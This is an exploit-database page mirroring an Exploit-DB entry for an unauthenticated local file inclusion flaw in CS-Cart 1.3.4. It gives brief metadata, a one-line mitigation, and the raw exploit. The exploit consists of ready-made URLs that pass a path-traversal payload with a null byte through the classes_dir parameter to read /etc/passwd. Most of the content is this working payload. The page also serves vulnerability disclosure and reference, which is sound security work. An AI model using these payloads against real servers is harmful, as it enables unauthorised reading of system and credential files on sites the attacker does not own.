header-logo
Suggest Exploit
vendor:
CS-Cart
by:
0xmmnbassel
8.8
CVSS
HIGH
unauthenticated LFI
20
CWE
Product Name: CS-Cart
Affected Version From: 1.3.4 and below
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:cs-cart:cs-cart
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

CS-Cart unauthenticated LFI

An unauthenticated LFI vulnerability exists in CS-Cart versions prior to 1.3.4. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The request contains a malicious classes_dir parameter which can be used to read arbitrary files from the server.

Mitigation:

Upgrade to the latest version of CS-Cart to mitigate this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: CS-Cart unauthenticated LFI
# Date: 2020-09-22
# Exploit Author:  0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.4
# Vulnerability Type: unauthenticated LFI


http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00
example: 
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
http://www.site.com/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00

Navigation

Suggest Exploit

Services By CQR